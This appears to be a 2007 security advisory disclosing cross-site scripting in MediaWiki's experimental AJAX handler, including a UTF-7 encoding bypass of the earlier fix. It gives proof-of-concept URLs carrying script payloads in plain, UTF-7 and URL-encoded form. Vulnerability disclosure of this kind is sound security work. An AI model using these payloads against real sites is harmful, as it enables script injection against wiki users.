mediawiki-xss.txt

`MediaWiki Cross-site Scripting  
  
Vulnerabilities.  
  
  
Date:  
18/02/2007  
  
Vendor:  
MediaWiki  
  
Vulnerable versions:  
MediaWiki 1.9.2 (latest) and below.  
  
Description:  
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack by expliting the experimental AJAX features, if enabled (default). This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding auto-detection has to be enabled for successful explitation.  
  
  
Proof-of-concept:  
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]  
UTF-7 XSS in post 1.8.2 versions.   
  
Examples:  
v1.8.2 and below:  
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E  
v1.8.3 - v1.9.2  
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-  
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded)   
  
  
Credit:  
Moshe BA from BugSec  
Tel:+972-3-9622655  
Email: Info [^A-t] BugSec \*D.O.T*\ com  
BugSec LTD. - www.BugSec.com  
http://www.bugsec.com/articles.php?Security=24  
`